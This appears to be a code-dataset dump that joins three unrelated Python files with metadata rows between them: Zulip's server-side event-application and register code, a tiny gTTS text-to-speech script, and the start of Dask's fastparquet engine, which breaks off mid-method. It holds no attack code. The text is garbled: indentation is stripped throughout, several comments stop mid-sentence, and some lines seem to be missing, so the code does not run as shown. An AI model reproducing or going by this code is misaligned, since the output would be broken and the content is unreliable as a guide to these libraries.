for obj in state["subscriptions"]:
if obj["name"].lower() == event["name"].lower():
obj[event["property"]] = event["value"]
if event["property"] == "description":
obj["rendered_description"] = event["rendered_description"]
if event.get("history_public_to_subscribers") is not None:
obj["history_public_to_subscribers"] = event[
"history_public_to_subscribers"
]
if event.get("is_web_public") is not None:
obj["is_web_public"] = event["is_web_public"]
# Also update the pure streams data
if "streams" in state:
for stream in state["streams"]:
if stream["name"].lower() == event["name"].lower():
prop = event["property"]
if prop in stream:
stream[prop] = event["value"]
if prop == "description":
stream["rendered_description"] = event["rendered_description"]
if event.get("history_public_to_subscribers") is not None:
stream["history_public_to_subscribers"] = event[
"history_public_to_subscribers"
]
if event.get("is_web_public") is not None:
stream["is_web_public"] = event["is_web_public"]
elif event["type"] == "default_streams":
state["realm_default_streams"] = event["default_streams"]
elif event["type"] == "default_stream_groups":
state["realm_default_stream_groups"] = event["default_stream_groups"]
elif event["type"] == "realm":
if event["op"] == "update":
field = "realm_" + event["property"]
state[field] = event["value"]
if event["property"] == "plan_type":
# Then there are some extra fields that also need to be set.
state["zulip_plan_is_not_limited"] = event["value"] != Realm.PLAN_TYPE_LIMITED
state["realm_upload_quota_mib"] = event["extra_data"]["upload_quota"]
policy_permission_dict = {
"create_public_stream_policy": "can_create_public_streams",
"create_private_stream_policy": "can_create_private_streams",
"create_web_public_stream_policy": "can_create_web_public_streams",
"invite_to_stream_policy": "can_subscribe_other_users",
"invite_to_realm_policy": "can_invite_others_to_realm",
}
# Tricky interaction: Whether we can create streams and can subscribe other users
# can get changed here.
if field == "realm_waiting_period_threshold":
for policy, permission in policy_permission_dict.items():
if permission in state:
state[permission] = user_profile.has_permission(policy)
if event["property"] in policy_permission_dict.keys():
if policy_permission_dict[event["property"]] in state:
state[policy_permission_dict[event["property"]]] = user_profile.has_permission(
event["property"]
)
# Finally, we need to recompute this value from its inputs.
state["can_create_streams"] = (
state["can_create_private_streams"]
or state["can_create_public_streams"]
or state["can_create_web_public_streams"]
)
elif event["op"] == "update_dict":
for key, value in event["data"].items():
state["realm_" + key] = value
# It's a bit messy, but this is where we need to
if key == "authentication_methods":
state["realm_password_auth_enabled"] = value["Email"] or value["LDAP"]
state["realm_email_auth_enabled"] = value["Email"]
elif event["op"] == "deactivated":
# deactivation UI; if it'd been a moment sooner, we've
# have rendered the app and then immediately got this
# event (or actually, more likely, an auth error on GET
# /events) and immediately reloaded into the same
# deactivation UI. Passing achieves the same result.
pass
else:
raise AssertionError("Unexpected event type {type}/{op}".format(**event))
elif event["type"] == "realm_user_settings_defaults":
if event["op"] == "update":
state["realm_user_settings_defaults"][event["property"]] = event["value"]
else:
raise AssertionError("Unexpected event type {type}/{op}".format(**event))
elif event["type"] == "subscription":
if event["op"] == "add":
added_stream_ids = {sub["stream_id"] for sub in event["subscriptions"]}
was_added = lambda s: s["stream_id"] in added_stream_ids
existing_stream_ids = {sub["stream_id"] for sub in state["subscriptions"]}
# add the new subscriptions
for sub in event["subscriptions"]:
if sub["stream_id"] not in existing_stream_ids:
if "subscribers" in sub and not include_subscribers:
sub = copy.deepcopy(sub)
del sub["subscribers"]
state["subscriptions"].append(sub)
# remove them from unsubscribed if they had been there
state["unsubscribed"] = [s for s in state["unsubscribed"] if not was_added(s)]
# remove them from never_subscribed if they had been there
state["never_subscribed"] = [s for s in state["never_subscribed"] if not was_added(s)]
elif event["op"] == "remove":
removed_stream_ids = {sub["stream_id"] for sub in event["subscriptions"]}
was_removed = lambda s: s["stream_id"] in removed_stream_ids
# Find the subs we are affecting.
removed_subs = list(filter(was_removed, state["subscriptions"]))
# Remove our user from the subscribers of the removed subscriptions.
if include_subscribers:
for sub in removed_subs:
sub["subscribers"].remove(user_profile.id)
state["unsubscribed"] += removed_subs
# Now filter out the removed subscriptions from subscriptions.
state["subscriptions"] = [s for s in state["subscriptions"] if not was_removed(s)]
elif event["op"] == "update":
for sub in state["subscriptions"]:
if sub["stream_id"] == event["stream_id"]:
sub[event["property"]] = event["value"]
elif event["op"] == "peer_add":
if include_subscribers:
stream_ids = set(event["stream_ids"])
user_ids = set(event["user_ids"])
for sub_dict in [
state["subscriptions"],
state["unsubscribed"],
state["never_subscribed"],
]:
for sub in sub_dict:
if sub["stream_id"] in stream_ids:
subscribers = set(sub["subscribers"]) | user_ids
sub["subscribers"] = sorted(list(subscribers))
elif event["op"] == "peer_remove":
if include_subscribers:
stream_ids = set(event["stream_ids"])
user_ids = set(event["user_ids"])
for sub_dict in [
state["subscriptions"],
state["unsubscribed"],
state["never_subscribed"],
]:
for sub in sub_dict:
if sub["stream_id"] in stream_ids:
subscribers = set(sub["subscribers"]) - user_ids
sub["subscribers"] = sorted(list(subscribers))
else:
raise AssertionError("Unexpected event type {type}/{op}".format(**event))
elif event["type"] == "presence":
if slim_presence:
user_key = str(event["user_id"])
else:
user_key = event["email"]
state["presences"][user_key] = get_presence_for_user(event["user_id"], slim_presence)[
user_key
]
elif event["type"] == "update_message":
# We don't return messages in /register, so we don't need to
# do anything for content updates, but we may need to update
# the unread_msgs data if the topic of an unread message changed.
if "new_stream_id" in event:
stream_dict = state["raw_unread_msgs"]["stream_dict"]
stream_id = event["new_stream_id"]
for message_id in event["message_ids"]:
if message_id in stream_dict:
stream_dict[message_id]["stream_id"] = stream_id
if TOPIC_NAME in event:
stream_dict = state["raw_unread_msgs"]["stream_dict"]
topic = event[TOPIC_NAME]
for message_id in event["message_ids"]:
if message_id in stream_dict:
stream_dict[message_id]["topic"] = topic
elif event["type"] == "delete_message":
if "message_id" in event:
message_ids = [event["message_id"]]
else:
message_ids = event["message_ids"] # nocoverage
max_message = (
Message.objects.filter(usermessage__user_profile=user_profile).order_by("-id").first()
)
if max_message:
state["max_message_id"] = max_message.id
else:
state["max_message_id"] = -1
if "raw_unread_msgs" in state:
for remove_id in message_ids:
remove_message_id_from_unread_mgs(state["raw_unread_msgs"], remove_id)
# The remainder of this block is about maintaining recent_private_conversations
if "raw_recent_private_conversations" not in state or event["message_type"] != "private":
return
# OK, we just deleted what had been the max_message_id for
# this recent conversation; we need to recompute that value
# from scratch. Definitely don't need to re-query everything,
state["raw_recent_private_conversations"] = get_recent_private_conversations(user_profile)
elif event["type"] == "reaction":
# The client will get the message with the reactions directly
pass
elif event["type"] == "submessage":
# The client will get submessages with their messages
pass
elif event["type"] == "typing":
# Typing notification events are transient and thus ignored
pass
elif event["type"] == "attachment":
# Attachment events are just for updating the "uploads" UI;
# they are not sent directly.
pass
elif event["type"] == "update_message_flags":
# We don't return messages in `/register`, so most flags we
if "raw_unread_msgs" in state and event["flag"] == "read" and event["op"] == "add":
for remove_id in event["messages"]:
remove_message_id_from_unread_mgs(state["raw_unread_msgs"], remove_id)
if event["flag"] == "starred" and "starred_messages" in state:
if event["op"] == "add":
state["starred_messages"] += event["messages"]
if event["op"] == "remove":
state["starred_messages"] = [
message
for message in state["starred_messages"]
if not (message in event["messages"])
]
elif event["type"] == "realm_domains":
if event["op"] == "add":
state["realm_domains"].append(event["realm_domain"])
elif event["op"] == "change":
for realm_domain in state["realm_domains"]:
if realm_domain["domain"] == event["realm_domain"]["domain"]:
realm_domain["allow_subdomains"] = event["realm_domain"]["allow_subdomains"]
elif event["op"] == "remove":
state["realm_domains"] = [
realm_domain
for realm_domain in state["realm_domains"]
if realm_domain["domain"] != event["domain"]
]
else:
raise AssertionError("Unexpected event type {type}/{op}".format(**event))
elif event["type"] == "realm_emoji":
state["realm_emoji"] = event["realm_emoji"]
elif event["type"] == "realm_export":
pass
elif event["type"] == "alert_words":
state["alert_words"] = event["alert_words"]
elif event["type"] == "muted_topics":
state["muted_topics"] = event["muted_topics"]
elif event["type"] == "muted_users":
state["muted_users"] = event["muted_users"]
elif event["type"] == "realm_filters":
state["realm_filters"] = event["realm_filters"]
elif event["type"] == "realm_linkifiers":
state["realm_linkifiers"] = event["realm_linkifiers"]
elif event["type"] == "realm_playgrounds":
state["realm_playgrounds"] = event["realm_playgrounds"]
elif event["type"] == "update_display_settings":
if event["setting_name"] != "timezone":
assert event["setting_name"] in UserProfile.display_settings_legacy
state[event["setting_name"]] = event["setting"]
elif event["type"] == "update_global_notifications":
assert event["notification_name"] in UserProfile.notification_settings_legacy
state[event["notification_name"]] = event["setting"]
elif event["type"] == "user_settings":
# timezone setting is not included in property_types dict because
# this setting is not a part of UserBaseSettings class.
if event["property"] != "timezone":
assert event["property"] in UserProfile.property_types
if event["property"] in {
**UserProfile.display_settings_legacy,
**UserProfile.notification_settings_legacy,
}:
state[event["property"]] = event["value"]
state["user_settings"][event["property"]] = event["value"]
elif event["type"] == "invites_changed":
pass
elif event["type"] == "user_group":
if event["op"] == "add":
state["realm_user_groups"].append(event["group"])
state["realm_user_groups"].sort(key=lambda group: group["id"])
elif event["op"] == "update":
for user_group in state["realm_user_groups"]:
if user_group["id"] == event["group_id"]:
user_group.update(event["data"])
elif event["op"] == "add_members":
for user_group in state["realm_user_groups"]:
if user_group["id"] == event["group_id"]:
user_group["members"].extend(event["user_ids"])
user_group["members"].sort()
elif event["op"] == "remove_members":
for user_group in state["realm_user_groups"]:
if user_group["id"] == event["group_id"]:
members = set(user_group["members"])
user_group["members"] = list(members - set(event["user_ids"]))
user_group["members"].sort()
elif event["op"] == "remove":
state["realm_user_groups"] = [
ug for ug in state["realm_user_groups"] if ug["id"] != event["group_id"]
]
else:
raise AssertionError("Unexpected event type {type}/{op}".format(**event))
elif event["type"] == "user_status":
user_id_str = str(event["user_id"])
user_status = state["user_status"]
away = event.get("away")
status_text = event.get("status_text")
emoji_name = event.get("emoji_name")
emoji_code = event.get("emoji_code")
reaction_type = event.get("reaction_type")
if user_id_str not in user_status:
user_status[user_id_str] = {}
if away is not None:
if away:
user_status[user_id_str]["away"] = True
else:
user_status[user_id_str].pop("away", None)
if status_text is not None:
if status_text == "":
user_status[user_id_str].pop("status_text", None)
else:
user_status[user_id_str]["status_text"] = status_text
if emoji_name is not None:
if emoji_name == "":
user_status[user_id_str].pop("emoji_name", None)
else:
user_status[user_id_str]["emoji_name"] = emoji_name
if emoji_code is not None:
if emoji_code == "":
user_status[user_id_str].pop("emoji_code", None)
else:
user_status[user_id_str]["emoji_code"] = emoji_code
if reaction_type is not None:
if reaction_type == UserStatus.UNICODE_EMOJI and emoji_name == "":
user_status[user_id_str].pop("reaction_type", None)
else:
user_status[user_id_str]["reaction_type"] = reaction_type
if not user_status[user_id_str]:
user_status.pop(user_id_str, None)
state["user_status"] = user_status
elif event["type"] == "has_zoom_token":
state["has_zoom_token"] = event["value"]
else:
raise AssertionError("Unexpected event type {}".format(event["type"]))
def do_events_register(
user_profile: UserProfile,
user_client: Client,
apply_markdown: bool = True,
client_gravatar: bool = False,
slim_presence: bool = False,
event_types: Optional[Sequence[str]] = None,
queue_lifespan_secs: int = 0,
all_public_streams: bool = False,
include_subscribers: bool = True,
include_streams: bool = True,
client_capabilities: Dict[str, bool] = {},
narrow: Collection[Sequence[str]] = [],
fetch_event_types: Optional[Collection[str]] = None,
) -> Dict[str, Any]:
# Technically we don't need to check this here because
# handling perspective to do it before contacting Tornado
check_supported_events_narrow_filter(narrow)
notification_settings_null = client_capabilities.get("notification_settings_null", False)
bulk_message_deletion = client_capabilities.get("bulk_message_deletion", False)
user_avatar_url_field_optional = client_capabilities.get(
"user_avatar_url_field_optional", False
)
stream_typing_notifications = client_capabilities.get("stream_typing_notifications", False)
user_settings_object = client_capabilities.get("user_settings_object", False)
if user_profile.realm.email_address_visibility != Realm.EMAIL_ADDRESS_VISIBILITY_EVERYONE:
# If real email addresses are not available to the user, their
# clients cannot compute gravatars, so we force-set it to false.
client_gravatar = False
if fetch_event_types is not None:
event_types_set: Optional[Set[str]] = set(fetch_event_types)
elif event_types is not None:
event_types_set = set(event_types)
else:
event_types_set = None
# Fill up the UserMessage rows if a soft-deactivated user has returned
reactivate_user_if_soft_deactivated(user_profile)
while True:
# Note that we pass event_types, not fetch_event_types here, since
# that's what controls which future events are sent.
queue_id = request_event_queue(
user_profile,
user_client,
apply_markdown,
client_gravatar,
slim_presence,
queue_lifespan_secs,
event_types,
all_public_streams,
narrow=narrow,
bulk_message_deletion=bulk_message_deletion,
stream_typing_notifications=stream_typing_notifications,
user_settings_object=user_settings_object,
)
if queue_id is None:
raise JsonableError(_("Could not allocate event queue"))
ret = fetch_initial_state_data(
user_profile,
event_types=event_types_set,
queue_id=queue_id,
client_gravatar=client_gravatar,
user_avatar_url_field_optional=user_avatar_url_field_optional,
user_settings_object=user_settings_object,
slim_presence=slim_presence,
include_subscribers=include_subscribers,
include_streams=include_streams,
)
events = get_user_events(user_profile, queue_id, -1)
try:
apply_events(
user_profile,
state=ret,
events=events,
fetch_event_types=fetch_event_types,
client_gravatar=client_gravatar,
slim_presence=slim_presence,
include_subscribers=include_subscribers,
)
except RestartEventException:
continue
else:
break
post_process_state(user_profile, ret, notification_settings_null)
if len(events) > 0:
ret["last_event_id"] = events[-1]["id"]
else:
ret["last_event_id"] = -1
return ret
def post_process_state(
user_profile: Optional[UserProfile], ret: Dict[str, Any], notification_settings_null: bool
) -> None:
if "raw_unread_msgs" in ret:
ret["unread_msgs"] = aggregate_unread_data(ret["raw_unread_msgs"])
del ret["raw_unread_msgs"]
if "raw_users" in ret:
user_dicts = list(ret["raw_users"].values())
user_dicts = sorted(user_dicts, key=lambda x: x["user_id"])
ret["realm_users"] = [d for d in user_dicts if d["is_active"]]
ret["realm_non_active_users"] = [d for d in user_dicts if not d["is_active"]]
for d in user_dicts:
d.pop("is_active")
del ret["raw_users"]
if "raw_recent_private_conversations" in ret:
ret["recent_private_conversations"] = sorted(
(
dict(
**value,
)
for (recipient_id, value) in ret["raw_recent_private_conversations"].items()
),
key=lambda x: -x["max_message_id"],
)
del ret["raw_recent_private_conversations"]
if not notification_settings_null and "subscriptions" in ret:
for stream_dict in ret["subscriptions"] + ret["unsubscribed"]:
handle_stream_notifications_compatibility(
user_profile, stream_dict, notification_settings_null
)
| true | true |
f725f33a4ea17ac202a72b0756189315bf8f2eb2 | 191 | py | Python | text2speech.py | sumit169-hub/text-to-speech | 589dd36f95abf216676c0ac12a522f2deb70a4db | [
"BSL-1.0"
] | null | null | null | text2speech.py | sumit169-hub/text-to-speech | 589dd36f95abf216676c0ac12a522f2deb70a4db | [
"BSL-1.0"
] | null | null | null | text2speech.py | sumit169-hub/text-to-speech | 589dd36f95abf216676c0ac12a522f2deb70a4db | [
"BSL-1.0"
] | null | null | null | from gtts import gTTS
from playsound import playsound
audio="speech.mp3"
language='en'
sp=gTTS(text=input('ENTER YOUR TEXT: \n') ,lang=language, slow=False)
sp.save(audio)
playsound(audio)
| 21.222222 | 69 | 0.759162 | from gtts import gTTS
from playsound import playsound
audio="speech.mp3"
language='en'
sp=gTTS(text=input('ENTER YOUR TEXT: \n') ,lang=language, slow=False)
sp.save(audio)
playsound(audio)
| true | true |
f725f37fb53556a224003a62cbca39f0bc36a66e | 47,357 | py | Python | dask/dataframe/io/parquet/fastparquet.py | ParticularMiner/dask | f40ef97ac802efb6d8bef03b03c6357cf871bc0a | [
"BSD-3-Clause"
] | null | null | null | dask/dataframe/io/parquet/fastparquet.py | ParticularMiner/dask | f40ef97ac802efb6d8bef03b03c6357cf871bc0a | [
"BSD-3-Clause"
] | null | null | null | dask/dataframe/io/parquet/fastparquet.py | ParticularMiner/dask | f40ef97ac802efb6d8bef03b03c6357cf871bc0a | [
"BSD-3-Clause"
] | null | null | null | import copy
import pickle
import threading
import warnings
from collections import OrderedDict, defaultdict
from contextlib import ExitStack
import numpy as np
import pandas as pd
import tlz as toolz
from packaging.version import parse as parse_version
from dask.core import flatten
try:
import fastparquet
from fastparquet import ParquetFile
from fastparquet.util import ex_from_sep, get_file_scheme, groupby_types, val_to_num
from fastparquet.writer import make_part_file, partition_on_columns
except ImportError:
pass
from dask.base import tokenize
#########################
# Fastparquet interface #
#########################
from dask.dataframe.io.parquet.utils import (
Engine,
_get_aggregation_depth,
_normalize_index_columns,
_parse_pandas_metadata,
_process_open_file_options,
_row_groups_to_parts,
_set_gather_statistics,
_set_metadata_task_size,
_sort_and_analyze_paths,
_split_user_options,
)
from dask.dataframe.io.utils import _is_local_fs, _meta_from_dtypes, _open_input_files
from dask.dataframe.utils import UNKNOWN_CATEGORIES
from dask.delayed import Delayed
from dask.utils import natural_sort_key
# Thread lock required to reset row-groups
_FP_FILE_LOCK = threading.RLock()
def _paths_to_cats(paths, file_scheme):
"""
Extract categorical fields and labels from hive- or drill-style paths.
FixMe: This has been pasted from https://github.com/dask/fastparquet/pull/471
Use fastparquet.api.paths_to_cats from fastparquet>0.3.2 instead.
Parameters
----------
paths (Iterable[str]): file paths relative to root
file_scheme (str):
Returns
-------
cats (OrderedDict[str, List[Any]]): a dict of field names and their values
"""
if file_scheme in ["simple", "flat", "other"]:
cats = {}
return cats
cats = OrderedDict()
raw_cats = OrderedDict()
s = ex_from_sep("/")
paths = toolz.unique(paths)
if file_scheme == "hive":
partitions = toolz.unique((k, v) for path in paths for k, v in s.findall(path))
for key, val in partitions:
cats.setdefault(key, set()).add(val_to_num(val))
raw_cats.setdefault(key, set()).add(val)
else:
i_val = toolz.unique(
(i, val) for path in paths for i, val in enumerate(path.split("/")[:-1])
)
for i, val in i_val:
key = "dir%i" % i
cats.setdefault(key, set()).add(val_to_num(val))
raw_cats.setdefault(key, set()).add(val)
for key, v in cats.items():
# Check that no partition names map to the same value after transformation by val_to_num
raw = raw_cats[key]
if len(v) != len(raw):
conflicts_by_value = OrderedDict()
for raw_val in raw_cats[key]:
conflicts_by_value.setdefault(val_to_num(raw_val), set()).add(raw_val)
conflicts = [
c for k in conflicts_by_value.values() if len(k) > 1 for c in k
]
raise ValueError("Partition names map to the same value: %s" % conflicts)
vals_by_type = groupby_types(v)
# Check that all partition names map to the same type after transformation by val_to_num
if len(vals_by_type) > 1:
examples = [x[0] for x in vals_by_type.values()]
warnings.warn(
"Partition names coerce to values of different types, e.g. %s"
% examples
)
cats = OrderedDict([(key, list(v)) for key, v in cats.items()])
return cats
paths_to_cats = (
_paths_to_cats # FixMe: use fastparquet.api.paths_to_cats for fastparquet>0.3.2
)
class FastParquetEngine(Engine):
@classmethod
def _organize_row_groups(
cls,
pf,
split_row_groups,
gather_statistics,
stat_col_indices,
filters,
dtypes,
base_path,
has_metadata_file,
chunksize,
aggregation_depth,
):
"""Organize row-groups by file."""
# Get partitioning metadata
pqpartitions = list(pf.cats)
# Fastparquet does not use a natural sorting
# order for partitioned data. Re-sort by path
if (
pqpartitions
and aggregation_depth
and pf.row_groups
and pf.row_groups[0].columns[0].file_path
):
pf.row_groups = sorted(
pf.row_groups,
key=lambda x: natural_sort_key(x.columns[0].file_path),
)
# Store types specified in pandas metadata
pandas_type = {}
if pf.row_groups and pf.pandas_metadata:
for c in pf.pandas_metadata.get("columns", []):
if "field_name" in c:
pandas_type[c["field_name"]] = c.get("pandas_type", None)
# Get the number of row groups per file
single_rg_parts = int(split_row_groups) == 1
file_row_groups = defaultdict(list)
file_row_group_stats = defaultdict(list)
file_row_group_column_stats = defaultdict(list)
cmax_last = {}
for rg, row_group in enumerate(pf.row_groups):
# We can filter partition columns here without dealing
# with statistics
if (
pqpartitions
and filters
and fastparquet.api.filter_out_cats(row_group, filters)
):
continue
# NOTE: Here we assume that all column chunks are stored
# in the same file. This is not strictly required by the
# parquet spec.
fp = row_group.columns[0].file_path
fpath = fp.decode() if isinstance(fp, bytes) else fp
if fpath is None:
if not has_metadata_file:
# There doesn't need to be a file_path if the
# row group is in the same file as the metadata.
# Assume this is a single-file dataset.
fpath = pf.fn
base_path = base_path or ""
else:
raise ValueError(
"Global metadata structure is missing a file_path string. "
"If the dataset includes a _metadata file, that file may "
"have one or more missing file_path fields."
)
# Append a tuple to file_row_groups. This tuple will
# be structured as: `(<local-row-group-id>, <global-row-group-id>)`
if file_row_groups[fpath]:
file_row_groups[fpath].append((file_row_groups[fpath][-1][0] + 1, rg))
else:
file_row_groups[fpath].append((0, rg))
if gather_statistics:
if single_rg_parts:
s = {
"file_path_0": fpath,
"num-rows": row_group.num_rows,
"total_byte_size": row_group.total_byte_size,
"columns": [],
}
else:
s = {
"num-rows": row_group.num_rows,
"total_byte_size": row_group.total_byte_size,
}
cstats = []
for name, i in stat_col_indices.items():
column = row_group.columns[i]
if column.meta_data.statistics:
cmin = None
cmax = None
# TODO: Avoid use of `pf.statistics`
if pf.statistics["min"][name][0] is not None:
cmin = pf.statistics["min"][name][rg]
cmax = pf.statistics["max"][name][rg]
elif dtypes[name] == "object":
cmin = column.meta_data.statistics.min_value
cmax = column.meta_data.statistics.max_value
# Older versions may not have cmin/cmax_value
if cmin is None:
cmin = column.meta_data.statistics.min
if cmax is None:
cmax = column.meta_data.statistics.max
# Decode bytes as long as "bytes" is not the
# expected `pandas_type` for this column
if (
isinstance(cmin, (bytes, bytearray))
and pandas_type.get(name, None) != "bytes"
):
cmin = cmin.decode("utf-8")
cmax = cmax.decode("utf-8")
if isinstance(cmin, np.datetime64):
tz = getattr(dtypes[name], "tz", None)
cmin = pd.Timestamp(cmin, tz=tz)
cmax = pd.Timestamp(cmax, tz=tz)
last = cmax_last.get(name, None)
if not (filters or chunksize or aggregation_depth):
# Only think about bailing if we don't need
# stats for filtering
if cmin is None or (last and cmin < last):
# We are collecting statistics for divisions
# only (no filters) - Column isn't sorted, or
# we have an all-null partition, so lets bail.
#
# Note: This assumes ascending order.
#
gather_statistics = False
file_row_group_stats = {}
file_row_group_column_stats = {}
break
if single_rg_parts:
s["columns"].append(
{
"name": name,
"min": cmin,
"max": cmax,
}
)
else:
cstats += [cmin, cmax]
cmax_last[name] = cmax
else:
if (
not (filters or chunksize or aggregation_depth)
and column.meta_data.num_values > 0
):
# We are collecting statistics for divisions
# only (no filters) - Lets bail.
gather_statistics = False
file_row_group_stats = {}
file_row_group_column_stats = {}
break
if single_rg_parts:
s["columns"].append({"name": name})
else:
cstats += [None, None, None]
if gather_statistics:
file_row_group_stats[fpath].append(s)
if not single_rg_parts:
file_row_group_column_stats[fpath].append(tuple(cstats))
return (
file_row_groups,
file_row_group_stats,
file_row_group_column_stats,
gather_statistics,
base_path,
)
@classmethod
def _get_thrift_row_groups(
cls,
pf,
filename,
row_groups,
):
"""Turn a set of row-groups into bytes-serialized form
using thrift via pickle.
"""
real_row_groups = []
for rg, rg_global in row_groups:
row_group = pf.row_groups[rg_global]
columns = row_group.columns
for c, col in enumerate(columns):
if c:
col.file_path = None
md = col.meta_data
md.key_value_metadata = None
# NOTE: Fastparquet may need the null count in the
# statistics, so we cannot just set statistics
# to none. Set attributes separately:
st = md.statistics
if st:
st.distinct_count = None
st.max = None
st.min = None
st.max_value = None
st.min_value = None
md.encodings = None
md.total_uncompressed_size = None
md.encoding_stats = None
row_group.columns = columns
real_row_groups.append(row_group)
return real_row_groups
@classmethod
def _make_part(
cls,
filename,
rg_list,
fs=None,
pf=None,
base_path=None,
partitions=None,
):
"""Generate a partition-specific element of `parts`."""
if partitions:
real_row_groups = cls._get_thrift_row_groups(
pf,
filename,
rg_list,
)
part = {"piece": (real_row_groups,)}
else:
# Get full path (empty strings should be ignored)
full_path = fs.sep.join([p for p in [base_path, filename] if p != ""])
row_groups = [rg[0] for rg in rg_list] # Don't need global IDs
part = {"piece": (full_path, row_groups)}
return part
@classmethod
def _collect_dataset_info(
cls,
paths,
fs,
categories,
index,
gather_statistics,
filters,
split_row_groups,
chunksize,
aggregate_files,
ignore_metadata_file,
metadata_task_size,
parquet_file_extension,
kwargs,
):
# Define the parquet-file (pf) object to use for metadata,
# Also, initialize `parts`. If `parts` is populated here,
# then each part will correspond to a file. Otherwise, each part will
# correspond to a row group (populated later).
# Extract "supported" key-word arguments from `kwargs`.
# Split items into `dataset_kwargs` and `read_kwargs`
dataset_kwargs, read_kwargs, user_kwargs = _split_user_options(**kwargs)
parts = []
_metadata_exists = False
if len(paths) == 1 and fs.isdir(paths[0]):
# This is a directory.
# Check if _metadata and/or _common_metadata files exists
base = paths[0]
_metadata_exists = True
if not ignore_metadata_file:
_metadata_exists = fs.isfile(fs.sep.join([base, "_metadata"]))
# Find all files if we are not using a _metadata file
if ignore_metadata_file or not _metadata_exists:
# For now, we need to discover every file under paths[0]
paths, base, fns = _sort_and_analyze_paths(fs.find(base), fs)
_update_paths = False
for fn in ["_metadata", "_common_metadata"]:
try:
fns.remove(fn)
_update_paths = True
except ValueError:
pass
if _update_paths:
paths = [fs.sep.join([base, fn]) for fn in fns]
_metadata_exists = False
if _metadata_exists:
# Using _metadata file (best-case scenario)
pf = ParquetFile(
fs.sep.join([base, "_metadata"]),
open_with=fs.open,
**dataset_kwargs,
)
else:
# Use 0th file
# Note that "_common_metadata" can cause issues for
# partitioned datasets.
if parquet_file_extension:
# Raise error if all files have been filtered by extension
len0 = len(paths)
paths = [
path for path in paths if path.endswith(parquet_file_extension)
]
if len0 and paths == []:
raise ValueError(
"No files satisfy the `parquet_file_extension` criteria "
f"(files must end with {parquet_file_extension})."
)
pf = ParquetFile(
paths[:1], open_with=fs.open, root=base, **dataset_kwargs
)
scheme = get_file_scheme(fns)
pf.file_scheme = scheme
pf.cats = paths_to_cats(fns, scheme)
if not gather_statistics:
parts = [fs.sep.join([base, fn]) for fn in fns]
else:
# This is a list of files
paths, base, fns = _sort_and_analyze_paths(paths, fs)
# Check if _metadata is in paths, and
# remove it if ignore_metadata_file=True
_metadata_exists = "_metadata" in fns
if _metadata_exists and ignore_metadata_file:
fns.remove("_metadata")
_metadata_exists = False
paths = [fs.sep.join([base, fn]) for fn in fns]
if _metadata_exists:
# We have a _metadata file, lets use it
pf = ParquetFile(
fs.sep.join([base, "_metadata"]),
open_with=fs.open,
**dataset_kwargs,
)
else:
# Rely on metadata for 0th file.
# Will need to pass a list of paths to read_partition
scheme = get_file_scheme(fns)
pf = ParquetFile(
paths[:1], open_with=fs.open, root=base, **dataset_kwargs
)
pf.file_scheme = scheme
pf.cats = paths_to_cats(fns, scheme)
if not gather_statistics:
parts = paths.copy()
# Check the `aggregate_files` setting
aggregation_depth = _get_aggregation_depth(
aggregate_files,
list(pf.cats),
)
# Ensure that there is no overlap between partition columns
# and explicit columns in `pf`
if pf.cats:
_partitions = [p for p in pf.cats if p not in pf.columns]
if not _partitions:
pf.cats = {}
elif len(_partitions) != len(pf.cats):
raise ValueError(
"No partition-columns should be written in the \n"
"file unless they are ALL written in the file.\n"
"columns: {} | partitions: {}".format(pf.columns, pf.cats.keys())
)
return {
"pf": pf,
"paths": paths,
"has_metadata_file": _metadata_exists,
"parts": parts,
"base": base,
"fs": fs,
"gather_statistics": gather_statistics,
"categories": categories,
"index": index,
"filters": filters,
"split_row_groups": split_row_groups,
"chunksize": chunksize,
"aggregate_files": aggregate_files,
"aggregation_depth": aggregation_depth,
"metadata_task_size": metadata_task_size,
"kwargs": {
"dataset": dataset_kwargs,
"read": read_kwargs,
**user_kwargs,
},
}
@classmethod
def _create_dd_meta(cls, dataset_info):
# Collect necessary information from dataset_info
pf = dataset_info["pf"]
index = dataset_info["index"]
categories = dataset_info["categories"]
columns = None
pandas_md = pf.pandas_metadata
if pandas_md:
(
index_names,
column_names,
storage_name_mapping,
column_index_names,
) = _parse_pandas_metadata(pandas_md)
# auto-ranges should not be created by fastparquet
column_names.extend(pf.cats)
else:
index_names = []
column_names = pf.columns + list(pf.cats)
storage_name_mapping = {k: k for k in column_names}
column_index_names = [None]
if index is None and len(index_names) > 0:
if len(index_names) == 1 and index_names[0] is not None:
index = index_names[0]
else:
index = index_names
# Normalize user inputs
column_names, index_names = _normalize_index_columns(
columns, column_names, index, index_names
)
all_columns = index_names + column_names
categories_dict = None
if isinstance(categories, dict):
categories_dict = categories
if categories is None:
categories = pf.categories
elif isinstance(categories, str):
categories = [categories]
else:
categories = list(categories)
# Check that categories are included in columns
if categories and not set(categories).intersection(all_columns):
raise ValueError(
"categories not in available columns.\n"
"categories: {} | columns: {}".format(categories, list(all_columns))
)
dtypes = pf._dtypes(categories)
dtypes = {storage_name_mapping.get(k, k): v for k, v in dtypes.items()}
index_cols = index or ()
if isinstance(index_cols, str):
index_cols = [index_cols]
for ind in index_cols:
if getattr(dtypes.get(ind), "numpy_dtype", None):
# index does not support masked types
dtypes[ind] = dtypes[ind].numpy_dtype
for cat in categories:
if cat in all_columns:
dtypes[cat] = pd.CategoricalDtype(categories=[UNKNOWN_CATEGORIES])
for catcol in pf.cats:
if catcol in all_columns:
dtypes[catcol] = pd.CategoricalDtype(categories=pf.cats[catcol])
meta = _meta_from_dtypes(all_columns, dtypes, index_cols, column_index_names)
# Update `dataset_info` and return `meta`
dataset_info["dtypes"] = dtypes
dataset_info["index"] = index
dataset_info["index_cols"] = index_cols
dataset_info["categories"] = categories
dataset_info["categories_dict"] = categories_dict
return meta
@classmethod
def _construct_collection_plan(cls, dataset_info):
# Collect necessary information from dataset_info
fs = dataset_info["fs"]
parts = dataset_info["parts"]
paths = dataset_info["paths"]
filters = dataset_info["filters"]
pf = dataset_info["pf"]
split_row_groups = dataset_info["split_row_groups"]
chunksize = dataset_info["chunksize"]
gather_statistics = dataset_info["gather_statistics"]
base_path = dataset_info["base"]
aggregation_depth = dataset_info["aggregation_depth"]
index_cols = dataset_info["index_cols"]
categories = dataset_info["categories"]
dtypes = dataset_info["dtypes"]
categories_dict = dataset_info["categories_dict"]
has_metadata_file = dataset_info["has_metadata_file"]
metadata_task_size = dataset_info["metadata_task_size"]
kwargs = dataset_info["kwargs"]
# Ensure metadata_task_size is set
# (Using config file or defaults)
metadata_task_size = _set_metadata_task_size(
dataset_info["metadata_task_size"], fs
)
# Determine which columns need statistics.
# At this point, gather_statistics is only True if
# the user specified calculate_divisions=True
